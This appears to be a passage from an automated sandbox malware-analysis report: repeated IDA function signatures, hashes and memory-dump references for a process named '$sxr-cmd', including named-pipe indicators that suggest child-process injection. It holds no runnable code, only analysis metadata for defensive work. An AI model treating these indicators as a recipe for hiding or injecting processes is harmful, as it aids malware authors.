                                                                                                            • API ID: ObjectSingleWait
                                                                                                            • String ID: wil
                                                                                                            • API String ID: 24740636-1589926490
                                                                                                            • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                            • Instruction ID: e6c1081329daca6271a9f114626134c00137b048fe7052d13b12f1a1103cef33
                                                                                                            • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                            • Instruction Fuzzy Hash: CB415331A08D4287F3A06B21D40027AA6E1EF867B4FF59131D90D6A6D4CF7ED46C8771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                            • String ID: $Application$System
                                                                                                            • API String ID: 3377411628-1881496484
                                                                                                            • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                            • Instruction ID: 44f18c17b60452acb20e90c92adf2542a1594e4029d6363e36c7e16f017bec4a
                                                                                                            • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                            • Instruction Fuzzy Hash: 97417C32B04F419AE750AF60E4403EDB7B4FB89768F845235DA4E66B58EF38D119C760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                            • String ID: :$\
                                                                                                            • API String ID: 3961617410-1166558509
                                                                                                            • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                            • Instruction ID: 0fb404038a352ca43de92ea80e5550c4f98a848643a0b04e881d8a3e9ae339e4
                                                                                                            • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                            • Instruction Fuzzy Hash: BB217421A18E428AE7D07B60B4850B9FAA1FB4DB75FC48231D92F63394DF7CD44C8620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1397130798-0
                                                                                                            • Opcode ID: 8e41fef93c0c3e03a2b4858334dae578715ba76b45c3a51f6cef48e23758e3a9
                                                                                                            • Instruction ID: bbcaf1b4ebca8c90bee4727695558eb70100192b9a373ae943c8290bd9f8bb2d
                                                                                                            • Opcode Fuzzy Hash: 8e41fef93c0c3e03a2b4858334dae578715ba76b45c3a51f6cef48e23758e3a9
                                                                                                            • Instruction Fuzzy Hash: C9917522A08E8186FBE5AB1194802B9F7A9FF48BA4FC58135D95D27794DF3CD54C8720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
                                                                                                              • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
                                                                                                              • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
                                                                                                              • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137F25CA
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137F25E8
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137F260F
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137F2636
                                                                                                            • _wcsicmp.MSVCRT ref: 00007FF7137F2650
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                            • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                            • API String ID: 3407644289-1668778490
                                                                                                            • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                            • Instruction ID: 818c81af3e53eb30f0c1dbcc7a3dec23b9ea7a7799b5932c5373529bd540b7bb
                                                                                                            • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                            • Instruction Fuzzy Hash: 1A315D25A08D0285F7D07F25E890379E6A8BF88BA0FC48435DA5E666A5DE3DE40CC731
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                            • String ID: &()[]{}^=;!%'+,`~
                                                                                                            • API String ID: 2516562204-381716982
                                                                                                            • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                            • Instruction ID: bdba72ce4105ede08c6e761d4fa9aa1589bf219ce7010f67e20ae223c78b5560
                                                                                                            • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                            • Instruction Fuzzy Hash: 0CC1D672B14B518AE790AF25E84027DB7A0FB48BA4F845135DE8D23B94DF3DE469C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF7137ED3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED46E
                                                                                                              • Part of subcall function 00007FF7137ED3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED485
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED4EE
                                                                                                              • Part of subcall function 00007FF7137ED3F0: iswspace.MSVCRT ref: 00007FF7137ED54D
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED569
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED58C
                                                                                                            • iswspace.MSVCRT ref: 00007FF7137F7EEE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                            • String ID: A
                                                                                                            • API String ID: 3731854180-3554254475
                                                                                                            • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                            • Instruction ID: c75d466a852547f1441658d0acca5e6b6477a8843d12117dfb3266dc756e372b
                                                                                                            • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                            • Instruction Fuzzy Hash: 26A19061909E82C9E7A0BB11A450279F6E4FF497A0F808035DA5DA7794DF3DE46EC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                            • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                            • API String ID: 1580871199-2613899276
                                                                                                            • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                            • Instruction ID: 404622d72fec3cfe62583b069c8fc4a1fd658d71d3aa97e8484cfa81ddeab1e4
                                                                                                            • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                            • Instruction Fuzzy Hash: 5F51B372A18F8286EB909B55E400279F7F4FB88BA4F845235DA5D27744DF3DD029C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                            • String ID: con
                                                                                                            • API String ID: 689241570-4257191772
                                                                                                            • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                            • Instruction ID: 55f89d60d49aac84793439e178455dbc95548549bf21975df2bf6cc317b35127
                                                                                                            • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                            • Instruction Fuzzy Hash: 8541B132A08A4586E350AF159484379FAA4FB8ABB4F948334DA6D673D0CF7DD84DC760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                            • String ID: PE
                                                                                                            • API String ID: 2941894976-4258593460
                                                                                                            • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                            • Instruction ID: 1e571bdddd30f063e4b51cf76c64c49abb76a64191e6f01041036dbfc378070d
                                                                                                            • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                            • Instruction Fuzzy Hash: 26415562608A5186F7A0AB11E450679FBE0FB89BA0F844230DE5D17B95DF3EE459CB30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                            • String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
                                                                                                            • API String ID: 2171963597-1213686612
                                                                                                            • Opcode ID: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction ID: 8ad1e9c30e7bd4d6325c55104014fdf7ecfbe2687ca43c98f297bb13caecb895
                                                                                                            • Opcode Fuzzy Hash: 222afe9738357af78c0991e138f7f32301e44ba52e3deabe560e99e21132f038
                                                                                                            • Instruction Fuzzy Hash: 3C217136614B54E2FB10CB25F458799B3A2F3E5BA9F900255EB5A02BA8DF3CC14DCB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF71380849D,?,?,?,00007FF71380F0C7), ref: 00007FF7137F0045
                                                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF71380F0C7,?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF7137F0071
                                                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F0092
                                                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7137F00A7
                                                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F0148
                                                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7137F0181
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 734197835-0
                                                                                                            • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                            • Instruction ID: 133a2dfacb88b2b925857e5460d8ca9b4d66ce2a758b3b54f0b18e7b8ae25951
                                                                                                            • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                            • Instruction Fuzzy Hash: 5961D432A0CE928AE3A1BB11A840339FA94FB49764F848131DD6E63794DF7DE41CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$Openwcsrchr
                                                                                                            • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                            • API String ID: 3402383852-1459555574
                                                                                                            • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                            • Instruction ID: 0d953309abcc0be7c4bb8e621d5becd839b2e21b27a5a8bab54d274caa1d9178
                                                                                                            • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                                                            • Instruction Fuzzy Hash: 71A1A361A09E4282EF90AB5590502BAE2E0FF85BB0FC44531DA5D2B7E4DF7ED959C330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcscmp
                                                                                                            • String ID: %s
                                                                                                            • API String ID: 243296809-3043279178
                                                                                                            • Opcode ID: 35b6f1010dc1ef857b77676c4f7a499f7a1f1047feda36267f0d1b8956f40b96
                                                                                                            • Instruction ID: ae5d37ffa45314bf27acf194f82f51a372f580574359ba83a656699f0a68d4a7
                                                                                                            • Opcode Fuzzy Hash: 35b6f1010dc1ef857b77676c4f7a499f7a1f1047feda36267f0d1b8956f40b96
                                                                                                            • Instruction Fuzzy Hash: E3A19322709BC696EBA1EB21D8803F9A395FB4C7A8F904135CA5D57695DF3CE64CC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
